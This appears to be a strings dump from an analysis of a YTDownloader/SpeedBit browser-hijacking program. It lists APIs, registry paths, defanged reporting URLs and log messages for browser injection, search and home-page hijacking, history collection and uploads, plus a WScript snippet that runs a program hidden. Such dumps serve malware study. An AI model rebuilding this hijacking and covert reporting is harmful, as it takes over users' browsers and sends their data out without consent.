sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
cannot create INSTEAD OF trigger on table: %S
no such trigger: %S
no such column: %s
-- TRIGGER %s
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor did not declare schema: %s
vtable constructor failed: %s
no such module: %s
at most %d tables in a join
table %s: xBestIndex returned an invalid plan
TABLE %s
cannot use index: %s
%s WITH AUTOMATIC INDEX
%s AS %s
%s VIA MULTI-INDEX UNION
%s WITH INDEX %s
%s VIRTUAL TABLE INDEX %d:%s
%s USING PRIMARY KEY
%s ORDER BY
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SHELL32.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpConnect
WinHttpCloseHandle
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpenRequest
WinHttpReadData
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
GetExtendedTcpTable
IPHLPAPI.DLL
WS2_32.dll
PSAPI.DLL
WTSAPI32.dll
Secur32.dll
CryptMsgClose
CertGetNameStringW
CertFreeCertificateContext
CertFindCertificateInStore
CertCloseStore
CryptMsgGetParam
CRYPT32.dll
USERENV.dll
HttpSendRequestExW
HttpSendRequestW
HttpAddRequestHeadersW
HttpQueryInfoW
HttpOpenRequestW
HttpEndRequestW
WININET.dll
CreatePipe
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
GetNamedPipeInfo
GetCPInfo
RegCreateKeyW
RegCreateKeyExW
RegOpenKeyW
RegQueryInfoKeyW
RegDeleteKeyA
RegDeleteKeyW
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegQueryInfoKeyA
RegOpenKeyA
RegEnumKeyExW
RegEnumKeyW
zcÁ
.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@
.?AVReportBuilder@Monitor@SpeedBit@@
.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
.?AVImplementation@ServerReporter@Monitor@SpeedBit@@
.?AVServerReporter@Monitor@SpeedBit@@
.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
.?AVCHttpAsync@@
.?AVPipedProcess@Utils@SpeedBit@@
.?AVImplementation@PipedProcess@Utils@SpeedBit@@
.?AVImplementation@MachineKey@Utils@SpeedBit@@
.?AVMachineKey@Utils@SpeedBit@@
.?AVCHttp@@
.?AVChromeBrowserHistory@SQLite@SpeedBit@@
.?AVException@sql@@
.?AVLoader@Extension@Chrome@SpeedBit@@
.?AVImplementation@Extension@Chrome@SpeedBit@@
.?AVBrowserInfo@Chrome@SpeedBit@@
.?AVFactory@BrowserInfo@Chrome@SpeedBit@@
.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@
.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@
.?AVExtension@Chrome@SpeedBit@@
.?AVWebDataDB@SQLite@SpeedBit@@
.?AVImplementation@WebDataDB@SQLite@SpeedBit@@
.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@
.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@
.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@
.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@
.?AVSettings@Chrome@General@Config@SpeedBit@@
.?AVUrlSet@Implementation@General@Config@SpeedBit@@
.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@
.?AVOperaSettings@Implementation@General@Config@SpeedBit@@
.?AVSettings@Firefox@General@Config@SpeedBit@@
.?AVSettings@Opera@General@Config@SpeedBit@@
.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@
.?AVChromeSettings@Implementation@General@Config@SpeedBit@@
.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@
.?AVValueSet@Chrome@General@Config@SpeedBit@@
.?AVUrlSet@General@Config@SpeedBit@@
.?AVValueSet@Firefox@General@Config@SpeedBit@@
.?AVChromeSettings@Implementation@User@Config@SpeedBit@@
.?AVSettings@Firefox@User@Config@SpeedBit@@
.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@
.?AVSettings@Chrome@User@Config@SpeedBit@@
.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@
.?AVInstallInfo@Firefox@SpeedBit@@
.?AVProfile@InstallInfo@Firefox@SpeedBit@@
.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@
.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@
.?AVBrowserSettings@Firefox@SpeedBit@@
.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@
.?AVBrowserSettings@Chrome@SpeedBit@@
if (WScript.Arguments.length > 0)
var root = WScript.Arguments(0);
for (var i = 1, n = WScript.Arguments.length; i < n; ++i)
args.push(WScript.Arguments(i));
var path = "\"" + root.replace(/\\*$/, "").replace(/\//g, "\\") + "\"";
path += " \"" + args.join("\" \"") + "\"";
var shell = WScript.CreateObject("WScript.Shell");
shell.Run(path, 0, false);
<requestedExecutionLevel level='highestAvailable' uiAccess='false' />
combase.dll
kernel32.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
Injection::Snapshot::Controller::IsChromeInstalled
Chrome installed:
Injection::Snapshot::Controller::IsFirefoxInstalled
Firefox installed:
Chrome unchanged:
Firefox unchanged:
Checking<Parameter.Input>
Checking<Parameter.Key>
777705555443332
5555443332
5555443332
logs\${ModuleName}.${Pid}.log
WatchmanKey::TimeBomb::UninstallTimeBomb
Reporting
PChromeExtensionMonitorWorkerThread started
ChromeExtensionMonitor::CollectExtensionInfo
ChromeExtensionMonitor::CheckExtension
8Reset DNS to 8.8.8.8 for adapter
WinHTTP Example/1.0
VVV.google.com
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Registry::Helper::RegOpenKeyExA
Chrome::StartPageProtectionEnabled
Chrome::SearchEngineProtectionEnabled
Chrome::RestoreOnStartupProtectionEnabled
Chrome::StartPageProtectionDisabled
Chrome::SearchEngineProtectionDisabled
Chrome::RestoreOnStartupProtectionDisabled
Firefox::StartPageChangedByUser
Firefox::SearchEngineChangedByUser
Explorer.HomePageEvent:
Explorer.SearchEngineEvent:
Firefox.HomePageEvent:
Firefox.SearchEngineEvent:
ProcessCatcher::ExecutionContext::Resume
Allocation<ExecutionContext>
iexplore.exe
rundll32.exe
chrome.exe
firefox.exe
opera.exe
safari.exe
navigator.exe
torch.exe
U.exe
epic.exe
browser.exe
Maxthon.exe
sbframe.exe
avant.exe
dragon.exe
bobrowser.exe
crossbrowse.exe
vosteran.exe
ProcessMonitor::ExecutionContext::Resume
E:\iexplore.exe|E:\rundll32.exe
E:\chrome.exe
E:\firefox.exe
E:\opera.exe
E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe
smci32.dll
smi32.exe
Utils::PipedProcess::Create
Utils::PipedProcess::Start
Utils::PipedProcess::WriteData
[ReportDllsThread]
ProcessWatcher::ExecutionContext::Resume
Local proxy port:
127.0.0.1
[ProxyMonitor::getProcessByPort]
Failed to get GetExtendedTcpTable
smei32.dll
[ReportBuilder::MakeDefaultBrowserSettingsElement]
[ReportBuilder::CalculateHash]
Result.Hash:
[ReportBuilder::MakeHistoryReport]
Building history report...
ReportBuilder::GetWMISystemInfo
ReportBuilder::GetExplorerBrowserInfo
ReportBuilder::GetChromeBrowserInfo
. Chrome Search:
History Report:
[ReportBuilder::MakeReport]
Report:
[ReportBuilder::GetExplorerBrowserInfo]
[ReportBuilder::GetChromeBrowserInfo]
Chrome::BrowserInfo::Factory::Create
Chrome::BrowserInfo::Factory::GetInfo
sma.exe
Utils::PipedProcess::ReadData
Utils::PipedProcess::Wait
Utils::PipedProcess::WriteEof
Utils::MachineKey::Create
Utils::MachineKey::Generate
Encrypt data. Key:
Decrypt data. Key:
ReportBuilder::MakeInstallReport
[ServerReporter::SendInstallReport]
ReportBuilder::MakeUninstallReport
[ServerReporter::SendUninstallReport]
ReportBuilder::MakeRegulatReport
[ServerReporter::SendRegularReport]
ReportBuilder::MakeUserActionReport
[ServerReporter::SendUserActionReport]
ReportBuilder::MakeHistoryReport
[ServerReporter::SendHistoryReport]
ServerReporter::MakeReport
ServerReporter::SendReport
[ServerReporter::SendReport]
ServerEncryption::CreateSessionKey
Report in Base 64:
10D2FBE6-2346-4627-A9F5-FB48313C5001
ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)
ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one
[ServerReporter::GetUserProfile]
[ServerReporter::MakeReport]
ServerReporter::GetUserProfile
ReportBuilder::Create
Result.Report:
[ServerReporter::SetLastReportTime]
WatchmanKey::Reporter::SetLastTime
Package url:
WatchmanKey::Updater::SetLastTime
.Service
\Microsoft\Windows\Start Menu
*.lnk
\Internet Explorer\iexplore.exe
\Safari\Safari.exe
/report
/report1
%d.%d.%d.%d%n
Created URL Set object from configuration. Name:
UrlSetID:
Could not find matching URL set... Using old configuration
[LocalScope::UpdateParser::ParseReportSection]
Monitor::ServerEncryption::CreateSessionKey
Full url:
Data url:
sbu.exe
smw.sys
wscript.exe
smhe.js
[Monitor::WatchmanGuard::SendReport]
InstallReporter
Monitor::ServerReporter::Create
Monitor::ServerReporter::SendInitialReport
/urlset:
Options.InjectAllBrowsers:
Options.InjectDefaultOnly:
Options.ServiceName:
Options.ProductCode:
Options.ProductPriority:
Options.EnablePinner:
Options.EnableRedirect:
Options.EnableYellowBandSuppression:
Options.UpdateUrl:
Options.ReportUrl:
Options.AutoStart:
Options.ProtectSearch:
Options.ProtectHome:
Options.ProtectTab:
Options.ExplorerInjection:
Options.ChromeInjection:
Options.FirefoxInjection:
Options.OperaInjection:
Options.ConfigPath:
Options.ConfigKey:
Getting current URL Set
Getting URL Set from options
] Provided. And is different from current URL set [
URL Set [
general_config.xml
system_config.xml
[WatchmanInstaller::SendReport1]
iexplore.exe is running, result for getting DLL's:
firefox.exe is running, result for getting DLL's:
chrome.exe is running, result for getting DLL's:
ServerReporter::Create
URL to use:
ServerReporter::SendRegularReport
[WatchmanInstaller::SendReport]
Currently set URLSet:
Updating system config with new URL set...
Already reported duiring first install
Report' been sent:
WatchmanInstaller::SendReport1
calling SendReport1...
WatchmanInstaller::SendReport
[Monitor::WatchmanMonitor::CreateSendReportTask]
SendReportTask
new<SendReportTask>
[Monitor::WatchmanMonitor::OnSendReportSucceeded]
[Monitor::WatchmanMonitor::OnSendReportFailed]
Need to send report!!!
Original report URL:
ServerReporter::SendInitialReport
[Monitor::WatchmanMonitor::OnChromeProtectionChanged]
User has changed the chrome protection for:
[Monitor::WatchmanMonitor::OnResetFirefoxProtection]
User has reset the firefox protection:
Next report task:
Scheduller::RegisterTask<SendReportTask>
Monitor::Application::EnsureSystemKey
Options.Revert:
Settings.Final:
@ADVAPI32.DLL
shlwapi.dll
Utils::Registry::OpenKeyExW
Subkey:
[Utils::Registry::RecursiveDeleteKeyW]
SHLWAPI.GetAddressOf<SHDeleteKeyW>
WKERNEL32.DLL
VERSION.DLL
hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx
\\.\pipe\
Could not create thread event. %%s
Could not create new client event. %%s
Could not create accept thread. %%s
Could not create work thread. %%s
Could not start thread. %%s
Stop IPC error. %%s
Pipe (0x%X) read problems. %%s
ENTDLL.DLL
Windows NT 6.1
%s?e=%s
zvl=%s&
%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s
&tss=%d&action=%s&actionparam=%s
[Utils::PipedProcess::CreateOutputHandles]
[Utils::PipedProcess::CreateInputHandles]
[Utils::PipedProcess::SpawnProcess]
Utils::PipedProcess::CreateOutputHandles
Utils::PipedProcess::CreateInputHandles
Utils::PipedProcess::SpawnProcess
[Utils::PipedProcess::Start]
[Utils::PipedProcess::Wait]
Utils::PipedProcess::WriteProc
[Utils::PipedProcess::WriteData]
Utils::PipedProcess::ReadProc
[Utils::PipedProcess::ReadData]
.cache
ntdll.dll
Could not open memory object. Object name: %s. %%s
Could not create memory object. Object name: %s. %%s
Could not map memory object. Object name: %s. Size: %u. %%s
Could not map memory object. Object name: %s. %%s
Could not create sync object for memory. Object name: %s. %%s
pathToSignedProductExe
SELECT * FROM Win32_OperatingSystem
[BrowserHistory::GetPropertyReport]
Found URL:
FIPHLPAPI.DLL
X-hX-hX-XX-XXXXXX
IExecAction::put_Path
IAction::QueryInterface<IExecAction>
IExecAction::put_Arguments
IExecAction::put_WorkingDirectory
http\shell\open\command
Software\Microsoft\Windows\CurrentVersion\App Paths
[Utils::SoftwareInfo::GetHttpOpenHandler]
Utils::Registry::OpenKeyW
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Could not create pipe. %%s
Could not allocate IPC memory. Requires size: %u
Event error. %%s
Could not create pipe event. %%s
Pipe connecting error. %%s
Error code: %u ('%s')
Not enough memory. Size: %s (%s)
Could not create IPC event. %%s
Fhttp
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: multipart/form-data; boundary=%s
XXX
HTTP/1.1
Content-Disposition: form-data; name="%s"
Software\Microsoft\Windows\CurrentVersion\Internet Settings
HTTP/1.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}
[SynchronousPipe::Read]
[SynchronousPipe::Write]
CChromeExtension::GetFileListInExtenstion
__MSG_
messages.json
manifest.json
CHROME.EXE
[Chrome::BrowserInfo::Query]
WebData
SHELL32.DLL
e\Application\chrome.exe
Google\Chrome
\resources.pak
\Google\Chrome\Application\chrome.exe
\Google\Chrome\Application\
\Web Data
[SQLite::Implementation::AddProvider]
[SQLite::Implementation::GetProviderById]
[SQLite::Implementation::GetFirstProviderId]
[SQLite::Implementation::GetProviderByKeyword]
[SQLite::Implementation::GetProviderId]
chrome-extension://
13050095043000000
hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
4BB42133-5533-4A0C-BF72-F1B8C8776A11
Checking<extensions.settings>
[Injection::Snapshot::Chrome::Settings::Dump]
[Injection::Snapshot::Firefox::Settings::Dump]
[Monitor::RestoreData::Controller::Build<ChromeSettings>]
[Monitor::RestoreData::Controller::Build<FirefoxSettings>]
[Injection::Snapshot::Builder::BuildSettings<ChromeSettings>]
[Injection::Snapshot::Builder::BuildSettings<FirefoxSettings>]
Injection::Snapshot::Parser::Parse<ChromeSettings>
new<ChromeSettings>
Injection::Snapshot::Parser::Parse<FirefoxSettings>
new<FirefoxSettings>
[Injection::Snapshot::Parser::Parse<ChromeSettings>]
ReadStringNode<AboutTabsUrl>
ReadStringNode<DefaultProviderKeyword>
[Injection::Snapshot::Parser::Parse<FirefoxSettings>]
Chrome::BrowserSettings::Create
[Injection::Snapshot::Controller::IsChromeInstalled]
Firefox::BrowserSettings::Create
[Injection::Snapshot::Controller::IsFirefoxInstalled]
Firefox::BrowserSettings::RestoreState
Chrome::BrowserSettings::RestoreState
Argument.SystemConfig:
Argument.Config::User:
Argument.Config::General:
Chrome::BrowserSettings::PropagateState
Firefox::BrowserSettings::PropagateState
Argument.UserSid:
WatchmanKey::Users::SaveRestoreData
[WatchmanKey::GetEncryptionKey]
MachineKey::Generate
MachineKey::Create
[WatchmanKey::LoadEncodedData]
[WatchmanKey::CleanupKey]
WatchmanKey::GetEncryptionKey
[WatchmanKey::SaveEncodedData]
WatchmanKey::System::Open
[WatchmanKey::System::LoadGeneralConfig]
[WatchmanKey::System::SaveGeneralConfig]
WatchmanKey::LoadEncodedData
WatchmanKey::SaveEncodedData
WatchmanKey::System::Ensure
[WatchmanKey::System::SaveSystemConfig]
[WatchmanKey::System::LoadSystemConfig]
WatchmanKey::EnsureKey
[WatchmanKey::Users::Ensure]
WatchmanKey::OpenKey
[WatchmanKey::Users::Open]
[WatchmanKey::Users::LoadConfiguration]
[WatchmanKey::Users::SaveConfiguration]
WatchmanKey::Users::Ensure
[WatchmanKey::Users::LoadRestoreData]
[WatchmanKey::Updater::SetLastTime]
[WatchmanKey::Updater::GetBlackListHash]
[WatchmanKey::Updater::SetBlackListHash]
[WatchmanKey::Reporter::SetLastTime]
[WatchmanKey::Reporter::GetLastTime]
[WatchmanKey::TimeBomb::Uninstall]
WatchmanKey::SystemKey::Open
{CFBFAE00-17A6-11D0-99CB-00C04FD64497}
{7F4EFF06-7032-458e-AE16-1C1D8255C28A}
smod.xml
SearchModulePlus.crx
DATAMNGR.DLL
IEBHO.DLL
VC32.DLL
[Config::General::UrlSet::Copy]
[Config::General::Chrome::Settings::Dump]
[Config::General::Chrome::ValueSet::Copy]
[Config::General::Chrome::Settings::Copy]
[Config::General::Firefox::Settings::Copy]
[Config::General::Firefox::Settings::Dump]
[Config::General::Opera::Settings::Dump]
[Config::General::Firefox::ValueSet::Copy]
[Config::General::Opera::Settings::Copy]
Config::General::Parser::ParseUrlSet
Config::General::Parser::ParseFirefoxSettings
Config::General::Parser::ParseChromeSettings
Config::General::Parser::ParseOperaSettings
ReadStringNode<StartPageUrl>
ReadStringNode<AboutTabUrl>
eReadStringNode<SearchScopeUrl>
ReadStringNode<SearchScopeIconUrl>
ReadStringNode<SearchScopeSuggestUrl>
[Config::General::Parser::ParseChromeSettings]
Config::General::Parser::ParseChromeValueSets
MissedElement<GoogleChrome>
ReadStringNode<HomePageUrl>
[Config::General::Parser::ParseChromeValueSets]
ReadStringNode<DefaultProviderSearchUrl>
ReadStringNode<DefaultProviderIconUrl>
[Config::General::Parser::ParseFirefoxSettings]
ReadStringNode<DefaultProviderSuggestUrl>
Config::General::Parser::ParseFirefoxValueSets
MissedElement<MozillaFirefox>
ReadOptionalStringNode<HomePageUrl>
[Config::General::Parser::ParseFirefoxValueSets]
ReadOptionalStringNode<SearchPluginUrl>
lReadOptionalStringNode<SearchPluginSuggestionUrl>
MissedElement<UrlSet>
[Config::General::Parser::ParseUrlSet]
ReadStringNode<TabPageUrl>
ReadStringNode<SearchEngineFaviconUrl>
yReadStringNode<SearchEngineSuggestionUrl>
ReadStringNode<SearchEngineSearchUrl>
[Config::General::Parser::ParseOperaSettings]
ReadStringNode<SearchEngineKeyword>
MissedElement<Opera>
ReadStringNode<Key>
[Config::General::Builder::Build<ChromeSettinsg>]
[Config::General::Builder::Build<OperaSettinsg>]
[Config::General::Builder::Build<FirefoxSettinsg>]
We couldn't find the URL Set section... probably an old configuration!
WatchmanKey::System::LoadGeneralConfig
WatchmanKey::System::SaveGeneralConfig
2.1.0.7
2.0.0.0
ReadOptionalStringNode<UrlSet>
ReadStringNode<ReportUrl>
ReadStringNode<UpdateUrl>
ReadBooleanNode<MozillaFirefox>
ReadBooleanNode<GoogleChrome>
Could not find URL Set in configuration. Probably older configuration.
ReadBooleanNode<Opera>
WatchmanKey::System::LoadSystemConfig
WatchmanKey::System::SaveSystemConfig
[Config::User::Chrome::Settings::Copy]
[Config::User::Firefox::Settings::Copy]
Config::User::Parser::ParseChromeSettings
Config::User::Parser::ParseFirefoxSettings
[Config::User::Parser::ParseChromeSettings]
[Config::User::Parser::ParseFirefoxSettings]
[Config::User::Builder::BuildFirefoxSettings]
[Config::User::Builder::BuildChromeSettings]
WatchmanKey::User::LoadConfiguration
WatchmanKey::User::SaveConfiguration
Mozilla\Firefox\
profiles.ini
prefs.js
[Firefox::InstallInfo::ReadProfiles]
[Firefox::InstallInfo::QueryProfiles]
[Firefox::InstallInfo::ParseProfiles]
Firefox::InstallInfo::ReadProfiles
Firefox::InstallInfo::ParseProfiles
[Firefox::InstallInfo::Query]
No profiles found! Maybe - first start of Firefox?
J[Firefox::BrowserSettings::MakeSnapshot]
[Firefox::BrowserSettings::RestoreState]
[Firefox::BrowserSettings::PropagateState]
Software\Microsoft\Windows\CurrentVersion\Ext\Settings
Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Software\Microsoft\Internet Explorer\AboutURLs
TopResultURLFallback
SuggestionURL
FaviconURL
IEXPLORE.EXE
Failed to call enum URL's. Error:
Software\Microsoft\Internet Explorer\URLSearchHooks
[Explorer::BrowserSettings::SetMainKeyValues]
[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]
[Explorer::BrowserSettings::SetSearchScopeKeyValues]
[Explorer::BrowserSettings::SetAboutURLsKeyValues]
Result.SearchScope:
Argument.SearchScopeToSearch:
Argument.Parent:
[Explorer::BrowserSettings::DeleteKey]
Argument.Subkey:
VirtualSpeedbitSearchScopeKey::EnsureKeyW
Key deleted:
BTopResultURL
FaviconURLFallback
SuggestionsURL
SuggestionsURLFallback
\Opera\launcher.exe
Opera Software\Opera Stable\
\Opera\
\opera.pak
Web Data
\resources\default_partner_content.json
KERNELBASE.DLL
Chrome::InstallInfo::Get
[Chrome::BrowserSettings::OpenConfigFiles]
SQLite::WebDataDB::Create
Argument.HomePageUrl:
[Chrome::BrowserSettings::SetHomePagePreferences]
[Chrome::BrowserSettings::SetDefaultProviderPreferences]
Argument.HomePageIsNewTabPage:
Argument.DefaultProviderKeyWord:
Argument.DefaultProviderId:
Argument.DefaultProviderEncoding:
Argument.DefaultProviderName:
Argument.DefaultProviderIconUrl:
Argument.DefaultProviderSearchUrl:
[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]
Argument.DefaultProviderSuggestUrl:
Argument.UrlsToRestoreOnStartup:
Argument.RestoreOnStartup:
Argument.KeywordToSearch:
[Chrome::BrowserSettings::GetSearchProviderId]
SQLite::WebDataDB::GetProviderById
SQLite::WebDataDB::GetFirstProviderId
[Chrome::BrowserSettings::EnsureSearchProvider]
Result.ProviderId:
[Chrome::BrowserSettings::DeleteSearchProvider]
SQLite::WebDataDB::Values::Create
[Chrome::BrowserSettings::MakeSnapshot]
[Chrome::BrowserSettings::RestoreState]
Chrome::BrowserSettings::DeleteSearchProvider
Chrome::BrowserSettings::OpenConfigFiles
SQLite::WebDataDB::SetDefaultProvider
[Chrome::BrowserSettings::PropagateState]
Chrome::BrowserSettings::EnsureSearchProvider
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe

BROWSE~2.EXE_3272:

.text
`.rdata
@.data
.rsrc
@.reloc
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
Process token open Error: %u
C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelperSrv\2013_with_xp\BrowserHelperSrv.pdb
KERNEL32.dll
USER32.dll
ADVAPI32.dll
GetProcessHeap
GetCPInfo
zcÁ
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
Amscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
BrowserHelper.exe
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Run
e:%d s:%d
\BrowserHelper.exe
C:\PROGRA~1\YTDOWN~1\BROWSE~2.EXE

BrowserHelper.exe_1284:

.text
`.rdata
@.data
.rsrc
@.reloc
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Higher: %x
Lower: %x
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelper\2013_with_xp\BrowserHelper.pdb
WinExec
KERNEL32.dll
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
RegCloseKey
RegCreateKeyExW
RegEnumKeyA
RegOpenKeyExA
RegDeleteKeyW
RegEnumKeyW
RegNotifyChangeKeyValue
RegOpenKeyW
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoW
WININET.dll
VERSION.dll
PSAPI.DLL
GetCPInfo
GetProcessHeap
zcÁ
.?AVCHttp@@
C:\PROGRA~1\YTDOWN~1\BrowserHelper.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
@Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: multipart/form-data; boundary=%s
HTTP/1.1
XXX
Content-Disposition: form-data; name="%s"
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Windows 95
Windows 98
Windows Me
Windows NT
Windows 2000
Windows XP
Windows 2003 Server
Windows Vista
Windows 7
Windows CE
%sLow\%s\
%s\%s\%s\
%C:\Users\Public\Documents\%s\%s\
%s\Application Data\%s\%s\
ConfigDB.dll
config.xml
<d/d/%d d:d:d::d 0x%X>
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::BackupTraceFile] %s
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
\StringFileInfo\x\%s
kernel32.dll
WININET.DLL
user32.dll
[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d
[CUtils::GetDAPExeLocation] Name: %s
[CUtils::GetDAPExeLocation] ___Error read DAP location from %s
PipeName
[CUtils::GetDAPPipeName] Name: %s
[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s
[CUtils::GetDAPWindowName] Name: %s
[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s
%d.%d.%d.%d
"%s" "%s"
d/d/%d d:d:d::d
"%s" %s
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
&exe%d=%s&ver%d=%s&arr%d=%s
&ver=%s&InstDate=%s&userid=%s&usid=%s&aff=%s&date=%s%&ch=%s&ch_pin=%s&ff=%s&ff_pin=%s&ie=%s&ie_pin=%s&in=%s&in_pin=%s&def=%s&ie2=%s&global=%s&num=%d
hXXp://hcfq9zfs.vmgoxp64.netdna-cdn.com/b.ashx?
%d-d-d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
0.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Internet.exe
%Program Files%\Internet Explorer\IEXPLORE.EXE
http\shell\open\command
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Mozilla Firefox
Google Chrome
Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.lnk
explorer.exe
BrowserHelper.txt
BrowserHelperBk.txt
Chrome
Mozilla
iexplore.exe
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
%s?e=%s
zvl=%s&
1.8.1.0
Updater.exe

YTDownloader.exe_2056:

.text
`.rdata
@.data
.idata
.rsrc
@.reloc
